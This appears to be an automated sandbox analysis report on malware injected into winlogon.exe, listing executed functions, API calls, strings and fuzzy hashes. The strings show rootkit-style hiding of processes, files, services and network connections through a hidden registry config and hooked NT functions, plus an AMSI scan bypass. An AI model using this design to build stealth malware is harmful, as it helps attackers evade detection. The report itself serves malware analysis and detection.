Associated: 00000029.00000002.2543865974.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_140000000_dllhost.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: 63251503df5c7392b59882377b05ff3c407c5ffe99838fad78ad3d93c79eabbc
Instruction ID: a4bc93d2c7b124559308cf7a4161fd93bc4ab92d57e3b019964b2e6119ad9c46
Opcode Fuzzy Hash: 63251503df5c7392b59882377b05ff3c407c5ffe99838fad78ad3d93c79eabbc
Instruction Fuzzy Hash: B7E0EDF1B5150086E709DB63E84439976A1FB9CB55F858024DA1907731DE3885D58654

Analysis Process: winlogon.exePID: 556, Parent PID: 1796COMMON

Executed Functions

Function 000001CA7D1E2C80 Relevance: 13.6, APIs: 9, Instructions: 131
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

TlsGetValue.KERNEL32 ref: 000001CA7D1E2CAD
TlsGetValue.KERNEL32 ref: 000001CA7D1E2CBC
TlsGetValue.KERNEL32 ref: 000001CA7D1E2CCB
NtEnumerateValueKey.NTDLL ref: 000001CA7D1E2D40
NtEnumerateValueKey.NTDLL ref: 000001CA7D1E2D76
NtEnumerateValueKey.NTDLL ref: 000001CA7D1E2DB3
TlsSetValue.KERNEL32 ref: 000001CA7D1E2E0F
TlsSetValue.KERNEL32 ref: 000001CA7D1E2E1E
TlsSetValue.KERNEL32 ref: 000001CA7D1E2E2D

Memory Dump Source

Source File: 0000002A.00000002.2573663142.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true

Associated: 0000002A.00000002.2572853621.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002A.00000002.2574699564.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002A.00000002.2575546910.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002A.00000002.2576429441.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002A.00000002.2577255446.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_1ca7d1e0000_winlogon.jbxd

Similarity

API ID: Value$Enumerate
String ID:
API String ID: 3520290360-0
Opcode ID: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
Instruction ID: ddcfc76e88451ae92f4f9cda427641abdeb8210533d5a923a24e23578d1e4606
Opcode Fuzzy Hash: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
Instruction Fuzzy Hash: BF51C333B4570487F326CB15E460E9AB3A4FB84B89F904119AE4A43754EF3AC905CB83

Function 000001CA7D1E1724 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157
registrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 000001CA7D1E172F
HeapAlloc.KERNEL32 ref: 000001CA7D1E173E

Part of subcall function 000001CA7D1E1264: GetProcessHeap.KERNEL32 ref: 000001CA7D1E126A
Part of subcall function 000001CA7D1E1264: HeapAlloc.KERNEL32 ref: 000001CA7D1E1279
Part of subcall function 000001CA7D1E1264: GetProcessHeap.KERNEL32 ref: 000001CA7D1E1293
Part of subcall function 000001CA7D1E1264: HeapAlloc.KERNEL32 ref: 000001CA7D1E12A4

Part of subcall function 000001CA7D1E1000: GetProcessHeap.KERNEL32 ref: 000001CA7D1E1006
Part of subcall function 000001CA7D1E1000: HeapAlloc.KERNEL32 ref: 000001CA7D1E1015
Part of subcall function 000001CA7D1E1000: GetProcessHeap.KERNEL32 ref: 000001CA7D1E1028
Part of subcall function 000001CA7D1E1000: HeapAlloc.KERNEL32 ref: 000001CA7D1E1037

RegOpenKeyExW.KERNELBASE ref: 000001CA7D1E17AE
RegOpenKeyExW.KERNELBASE ref: 000001CA7D1E17DB
RegCloseKey.ADVAPI32 ref: 000001CA7D1E17F5
RegOpenKeyExW.KERNELBASE ref: 000001CA7D1E1815
RegCloseKey.KERNELBASE ref: 000001CA7D1E1830
RegOpenKeyExW.KERNELBASE ref: 000001CA7D1E1850
RegCloseKey.ADVAPI32 ref: 000001CA7D1E186B
RegOpenKeyExW.KERNELBASE ref: 000001CA7D1E188B
RegCloseKey.ADVAPI32 ref: 000001CA7D1E18A6
RegOpenKeyExW.KERNELBASE ref: 000001CA7D1E18C6
RegCloseKey.ADVAPI32 ref: 000001CA7D1E18E1
RegOpenKeyExW.KERNELBASE ref: 000001CA7D1E1901
RegCloseKey.ADVAPI32 ref: 000001CA7D1E191C
RegOpenKeyExW.KERNELBASE ref: 000001CA7D1E193C
RegCloseKey.ADVAPI32 ref: 000001CA7D1E1957
RegOpenKeyExW.KERNELBASE ref: 000001CA7D1E1977
RegCloseKey.ADVAPI32 ref: 000001CA7D1E1992
RegCloseKey.KERNELBASE ref: 000001CA7D1E199C

Part of subcall function 000001CA7D1E12B8: RegQueryInfoKeyW.ADVAPI32 ref: 000001CA7D1E1315
Part of subcall function 000001CA7D1E12B8: GetProcessHeap.KERNEL32 ref: 000001CA7D1E1323
Part of subcall function 000001CA7D1E12B8: HeapAlloc.KERNEL32 ref: 000001CA7D1E1334
Part of subcall function 000001CA7D1E12B8: RegEnumValueW.ADVAPI32 ref: 000001CA7D1E1393
Part of subcall function 000001CA7D1E12B8: GetProcessHeap.KERNEL32 ref: 000001CA7D1E13DB
Part of subcall function 000001CA7D1E12B8: HeapAlloc.KERNEL32 ref: 000001CA7D1E13E9
Part of subcall function 000001CA7D1E12B8: GetProcessHeap.KERNEL32 ref: 000001CA7D1E1406
Part of subcall function 000001CA7D1E12B8: HeapFree.KERNEL32 ref: 000001CA7D1E1414
Part of subcall function 000001CA7D1E12B8: lstrlenW.KERNEL32 ref: 000001CA7D1E141D
Part of subcall function 000001CA7D1E12B8: GetProcessHeap.KERNEL32 ref: 000001CA7D1E142B
Part of subcall function 000001CA7D1E12B8: HeapAlloc.KERNEL32 ref: 000001CA7D1E1439

Strings

pid, xrefs: 000001CA7D1E180E
tcp_remote, xrefs: 000001CA7D1E1935
tcp_local, xrefs: 000001CA7D1E18FA
paths, xrefs: 000001CA7D1E1884
startup, xrefs: 000001CA7D1E17D1
process_names, xrefs: 000001CA7D1E1849
SOFTWARE\$rbx-config, xrefs: 000001CA7D1E178E
service_names, xrefs: 000001CA7D1E18BF
udp, xrefs: 000001CA7D1E1970

Memory Dump Source

Source File: 0000002A.00000002.2573663142.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true

Associated: 0000002A.00000002.2572853621.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002A.00000002.2574699564.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002A.00000002.2575546910.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002A.00000002.2576429441.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002A.00000002.2577255446.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_1ca7d1e0000_winlogon.jbxd

Similarity

API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
String ID: SOFTWARE\$rbx-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
API String ID: 2135414181-3414887735
Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
Instruction ID: 16a9fbc9ca01aa2ad8d01d5c7c5c6cd5cef1b3026fde7233e4cf92ec2729da17
Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
Instruction Fuzzy Hash: A7711637A51B5986FB119F65E8A0AD833A5FF84B8DF811111DE4D43B28DE3AC584C392

Function 000001CA7D1E1E74 Relevance: 43.8, APIs: 8, Strings: 17, Instructions: 95
memorythreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThread.KERNEL32 ref: 000001CA7D1E1E7F

Part of subcall function 000001CA7D1E22A8: GetModuleHandleA.KERNEL32(?,?,?,000001CA7D1E1EB1), ref: 000001CA7D1E22C0
Part of subcall function 000001CA7D1E22A8: GetProcAddress.KERNEL32(?,?,?,000001CA7D1E1EB1), ref: 000001CA7D1E22D1

CreateThread.KERNELBASE ref: 000001CA7D1E2043
TlsAlloc.KERNEL32 ref: 000001CA7D1E2049
TlsAlloc.KERNEL32 ref: 000001CA7D1E2055
TlsAlloc.KERNEL32 ref: 000001CA7D1E2061
TlsAlloc.KERNEL32 ref: 000001CA7D1E206D
TlsAlloc.KERNEL32 ref: 000001CA7D1E2079
TlsAlloc.KERNEL32 ref: 000001CA7D1E2085

Strings

NtEnumerateValueKey, xrefs: 000001CA7D1E1F36
NtQueryDirectoryFileEx, xrefs: 000001CA7D1E1EFC
NtDeviceIoControlFile, xrefs: 000001CA7D1E1FB6
NtQuerySystemInformation, xrefs: 000001CA7D1E1EA5
EnumServiceGroupW, xrefs: 000001CA7D1E1F50
amsi.dll, xrefs: 000001CA7D1E2019
NtEnumerateKey, xrefs: 000001CA7D1E1F19
NtResumeThread, xrefs: 000001CA7D1E1EC2
sechost.dll, xrefs: 000001CA7D1E1F99
advapi32.dll, xrefs: 000001CA7D1E1F57, 000001CA7D1E1F78
PdhGetFormattedCounterArrayW, xrefs: 000001CA7D1E1FF1
AmsiScanBuffer, xrefs: 000001CA7D1E2012
NtQueryDirectoryFile, xrefs: 000001CA7D1E1EDF
ntdll.dll, xrefs: 000001CA7D1E1E8D
PdhGetRawCounterArrayW, xrefs: 000001CA7D1E1FD0
pdh.dll, xrefs: 000001CA7D1E1FD7, 000001CA7D1E1FF8
EnumServicesStatusExW, xrefs: 000001CA7D1E1F71, 000001CA7D1E1F92

Memory Dump Source

Source File: 0000002A.00000002.2573663142.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true

Associated: 0000002A.00000002.2572853621.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002A.00000002.2574699564.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002A.00000002.2575546910.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002A.00000002.2576429441.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002A.00000002.2577255446.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_1ca7d1e0000_winlogon.jbxd

Similarity

API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
API String ID: 1735320900-4225371247
Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
Instruction ID: 28d763e4b3efa6897c284255733b152927e4241509441b1b3e99965525c9534b
Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
Instruction Fuzzy Hash: 115171B2E91B4EA5FB03DB64E860FD43322BF4074DFC00956A40942565EE7AC25AD3E3

Function 000001CA7D1EEF88 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 140
librarymemoryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32(?,00000100,00000000,000001CA7D1EF34A,?,?,00000000,000001CA7D1EF2CD), ref: 000001CA7D1EEFF5
GetLastError.KERNEL32(?,?,00000000,000001CA7D1EF2CD), ref: 000001CA7D1EF007
LoadLibraryExW.KERNEL32(?,?,00000000,000001CA7D1EF2CD), ref: 000001CA7D1EF049
VirtualProtect.KERNELBASE ref: 000001CA7D1EF0A5
VirtualProtect.KERNEL32 ref: 000001CA7D1EF0D6
FreeLibrary.KERNEL32(?,?,00000000,000001CA7D1EF2CD), ref: 000001CA7D1EF11A
GetProcAddress.KERNEL32(?,?,00000000,000001CA7D1EF2CD), ref: 000001CA7D1EF126

Strings

ext-ms-, xrefs: 000001CA7D1EF02E
api-ms-, xrefs: 000001CA7D1EF01B
AppPolicyGetProcessTerminationMethod, xrefs: 000001CA7D1EF157, 000001CA7D1EF165

Memory Dump Source

Source File: 0000002A.00000002.2573663142.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true

Associated: 0000002A.00000002.2572853621.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002A.00000002.2574699564.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002A.00000002.2575546910.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002A.00000002.2576429441.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002A.00000002.2577255446.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_1ca7d1e0000_winlogon.jbxd

Similarity

API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
API String ID: 740688525-1880043860
Opcode ID: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
Instruction ID: 75b8f92d8bfc56aebef74cbf69bbb5d49082de77f78bb49cf1e15368de41eb5e
Opcode Fuzzy Hash: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
Instruction Fuzzy Hash: 91519C72B4170C51FA169B96A800BE57261BF48BB9FC847249E39473D4EF3AD505C783

Function 000001CA7D1E6270 Relevance: 9.2, APIs: 6, Instructions: 240
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThreadId.KERNEL32 ref: 000001CA7D1E62AB
GetThreadContext.KERNEL32 ref: 000001CA7D1E6415

Part of subcall function 000001CA7D1E60A0: GetCurrentThreadId.KERNEL32 ref: 000001CA7D1E60A4

Memory Dump Source

Source File: 0000002A.00000002.2573663142.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true

Associated: 0000002A.00000002.2572853621.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002A.00000002.2574699564.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002A.00000002.2575546910.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002A.00000002.2576429441.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002A.00000002.2577255446.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_1ca7d1e0000_winlogon.jbxd

Similarity

API ID: Thread$Current$Context
String ID:
API String ID: 1666949209-0
Opcode ID: 62de8192582035d3c174f7317d52215c3d31caf77dd5d103fa0b8274126801a3
Instruction ID: d05defe120a4688720ce9ecdd58902b16fb62d512cdd13eabecee864d7326d01
Opcode Fuzzy Hash: 62de8192582035d3c174f7317d52215c3d31caf77dd5d103fa0b8274126801a3
Instruction Fuzzy Hash: 1DD1CC37644B8C82FA71DB0AE49079A77A0F788B89F900512EACD47765DF3DC541CB82

Function 000001CA7D1E1E3C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 13
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE ref: 000001CA7D1E1E47
GetProcAddress.KERNEL32 ref: 000001CA7D1E1E57
SleepEx.KERNELBASE ref: 000001CA7D1E1E67

Strings

AmsiScanBuffer, xrefs: 000001CA7D1E1E50
amsi.dll, xrefs: 000001CA7D1E1E40

Memory Dump Source

Source File: 0000002A.00000002.2573663142.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true

Associated: 0000002A.00000002.2572853621.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002A.00000002.2574699564.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002A.00000002.2575546910.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002A.00000002.2576429441.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002A.00000002.2577255446.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_1ca7d1e0000_winlogon.jbxd

Similarity

API ID: AddressLibraryLoadProcSleep
String ID: AmsiScanBuffer$amsi.dll
API String ID: 188063004-3248079830
Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
Instruction ID: 3f2b23ccba4f01efca1837d1ec0e5ebe98186c814f68ab41dbead1d3c470ee30
Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
Instruction Fuzzy Hash: FFD06272ED3708D5F90B6B51E8A4FD43262BF54B09FC50855C50E01264DE2EC659D3D3

Function 000001CA7D1E5810 Relevance: 7.8, APIs: 5, Instructions: 318
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThreadId.KERNEL32 ref: 000001CA7D1E5896

Memory Dump Source

Source File: 0000002A.00000002.2573663142.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true

Associated: 0000002A.00000002.2572853621.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002A.00000002.2574699564.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002A.00000002.2575546910.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002A.00000002.2576429441.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002A.00000002.2577255446.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_1ca7d1e0000_winlogon.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: 4460526132078707f03e529f17315c9f8621164f7a74e4fe9c23d362e9fa087d
Instruction ID: c4fb3315ca78ad6c88cc819d43d3822fc1bb5b5b3bb77f142309b4c7efaf3f70
Opcode Fuzzy Hash: 4460526132078707f03e529f17315c9f8621164f7a74e4fe9c23d362e9fa087d
Instruction Fuzzy Hash: A802F933659B8886F761CB15F49079AB7A0F7C4799F500015EA8E87BA8DF7DC484CB42

Function 000001CA7D1E3EC8 Relevance: 7.5, APIs: 5, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(?,?,?,?,?,000001CA7D1E3A5B), ref: 000001CA7D1E3EDB
GetCurrentProcess.KERNEL32(?,?,?,?,?,000001CA7D1E3A5B), ref: 000001CA7D1E3F0E
VirtualProtectEx.KERNELBASE(?,?,?,?,?,000001CA7D1E3A5B), ref: 000001CA7D1E3F2E
GetCurrentProcess.KERNEL32(?,?,?,?,?,000001CA7D1E3A5B), ref: 000001CA7D1E3F47
VirtualProtectEx.KERNELBASE(?,?,?,?,?,000001CA7D1E3A5B), ref: 000001CA7D1E3F68

Memory Dump Source

Source File: 0000002A.00000002.2573663142.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true

Associated: 0000002A.00000002.2572853621.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002A.00000002.2574699564.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002A.00000002.2575546910.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002A.00000002.2576429441.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002A.00000002.2577255446.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_1ca7d1e0000_winlogon.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModule
String ID:
API String ID: 1092925422-0
Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
Instruction ID: 4b0ed5361dff3adcda6195a5dc2af1083a8005ab2c1b804d84ff7dccd2579ba4
Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
Instruction Fuzzy Hash: 72115E37A5574493FB268B61E404A9AB7B0FB44B89F440026DA4D43798EF7EC954C7C3

Function 000001CA7D1B2EBC Relevance: 6.2, APIs: 4, Instructions: 240memorylibraryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 000001CA7D1B2F7B
VirtualProtect.KERNELBASE ref: 000001CA7D1B2FA5
LoadLibraryA.KERNELBASE ref: 000001CA7D1B302E
VirtualProtect.KERNELBASE ref: 000001CA7D1B31C2

Memory Dump Source

Source File: 0000002A.00000003.2075272347.000001CA7D1B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_3_1ca7d1b0000_winlogon.jbxd

Similarity

API ID: Virtual$Protect$AllocLibraryLoad
String ID:
API String ID: 3316853933-0
Opcode ID: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
Instruction ID: fab056db1c559ce614da3632ff79b2cd998d8c65ade00f4a8a9fe06968449f78
Opcode Fuzzy Hash: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
Instruction Fuzzy Hash: B291F5B3F4139887EB558F29D400FA9B395FF55B98F9481249E4D07B88DA36D822C742

Function 000001CA7D1E4120 Relevance: 4.6, APIs: 3, Instructions: 64
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualQuery.KERNEL32 ref: 000001CA7D1E41A6
VirtualAlloc.KERNEL32 ref: 000001CA7D1E41E0

Memory Dump Source

Source File: 0000002A.00000002.2573663142.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true

Associated: 0000002A.00000002.2572853621.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002A.00000002.2574699564.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002A.00000002.2575546910.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002A.00000002.2576429441.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002A.00000002.2577255446.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_1ca7d1e0000_winlogon.jbxd

Similarity

API ID: Virtual$AllocQuery
String ID:
API String ID: 31662377-0
Opcode ID: a8802b86f0811ea88e9113a3d60b8cb8649c82089feb35d3c44dd7bdfe1e6621
Instruction ID: 31ae54dde4bc601838691571fe20e4d19e02a82357ab131b83e5d70d6c66b96e
Opcode Fuzzy Hash: a8802b86f0811ea88e9113a3d60b8cb8649c82089feb35d3c44dd7bdfe1e6621
Instruction Fuzzy Hash: BD317533A55B4981FA32CB65F050B8A72A4F78878DF900535E5CD46B94DF3EC1408B83

Function 000001CA7D1E3A1C Relevance: 4.5, APIs: 3, Instructions: 39
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32 ref: 000001CA7D1E3A35
PathFindFileNameW.SHLWAPI ref: 000001CA7D1E3A44

Part of subcall function 000001CA7D1E3F88: StrCmpNIW.SHLWAPI(?,?,?,000001CA7D1E272F), ref: 000001CA7D1E3FA0

Part of subcall function 000001CA7D1E3EC8: GetModuleHandleW.KERNEL32(?,?,?,?,?,000001CA7D1E3A5B), ref: 000001CA7D1E3EDB
Part of subcall function 000001CA7D1E3EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,000001CA7D1E3A5B), ref: 000001CA7D1E3F0E
Part of subcall function 000001CA7D1E3EC8: VirtualProtectEx.KERNELBASE(?,?,?,?,?,000001CA7D1E3A5B), ref: 000001CA7D1E3F2E
Part of subcall function 000001CA7D1E3EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,000001CA7D1E3A5B), ref: 000001CA7D1E3F47
Part of subcall function 000001CA7D1E3EC8: VirtualProtectEx.KERNELBASE(?,?,?,?,?,000001CA7D1E3A5B), ref: 000001CA7D1E3F68

CreateThread.KERNELBASE ref: 000001CA7D1E3A8B

Part of subcall function 000001CA7D1E1E74: GetCurrentThread.KERNEL32 ref: 000001CA7D1E1E7F
Part of subcall function 000001CA7D1E1E74: CreateThread.KERNELBASE ref: 000001CA7D1E2043
Part of subcall function 000001CA7D1E1E74: TlsAlloc.KERNEL32 ref: 000001CA7D1E2049
Part of subcall function 000001CA7D1E1E74: TlsAlloc.KERNEL32 ref: 000001CA7D1E2055
Part of subcall function 000001CA7D1E1E74: TlsAlloc.KERNEL32 ref: 000001CA7D1E2061
Part of subcall function 000001CA7D1E1E74: TlsAlloc.KERNEL32 ref: 000001CA7D1E206D
Part of subcall function 000001CA7D1E1E74: TlsAlloc.KERNEL32 ref: 000001CA7D1E2079
Part of subcall function 000001CA7D1E1E74: TlsAlloc.KERNEL32 ref: 000001CA7D1E2085

Memory Dump Source

Source File: 0000002A.00000002.2573663142.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true

Associated: 0000002A.00000002.2572853621.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002A.00000002.2574699564.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002A.00000002.2575546910.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002A.00000002.2576429441.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002A.00000002.2577255446.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_1ca7d1e0000_winlogon.jbxd

Similarity

API ID: Alloc$CurrentThread$CreateFileModuleNameProcessProtectVirtual$FindHandlePath
String ID:
API String ID: 2779030803-0
Opcode ID: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
Instruction ID: 5a3ca2a828a2f69e8ddffaa21c5641dcb192bd3c096c6af3b0a23b43865aa00f
Opcode Fuzzy Hash: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
Instruction Fuzzy Hash: FD116937E9070982FB66A722A549FE932A0BF84B4FFC000199406C11D0EF3BC58587D3

Function 000001CA7D1E5530 Relevance: 4.5, APIs: 3, Instructions: 23
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 000001CA7D1E5534
VirtualProtect.KERNEL32 ref: 000001CA7D1E5577
FlushInstructionCache.KERNEL32 ref: 000001CA7D1E558C

Memory Dump Source

Source File: 0000002A.00000002.2573663142.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true

Associated: 0000002A.00000002.2572853621.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002A.00000002.2574699564.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002A.00000002.2575546910.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002A.00000002.2576429441.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002A.00000002.2577255446.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_1ca7d1e0000_winlogon.jbxd

Similarity

API ID: CacheCurrentFlushInstructionProcessProtectVirtual
String ID:
API String ID: 3733156554-0
Opcode ID: 50caac35bfbc2d5f59ac81492b3b3ec34dc9555305fb9744858cadce20ffe8b5
Instruction ID: d66c06046afa48536f3f5d6c761f082350603e171004f0d7298866914a91c0bf
Opcode Fuzzy Hash: 50caac35bfbc2d5f59ac81492b3b3ec34dc9555305fb9744858cadce20ffe8b5
Instruction Fuzzy Hash: BAF01237658B4880F6319B05E451B8A77A1FB887D9F544111BACD07769CA3AC580CB82

Function 000001CA7D1E1BC4 Relevance: 1.6, APIs: 1, Instructions: 68
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000001CA7D1E1724: GetProcessHeap.KERNEL32 ref: 000001CA7D1E172F
Part of subcall function 000001CA7D1E1724: HeapAlloc.KERNEL32 ref: 000001CA7D1E173E
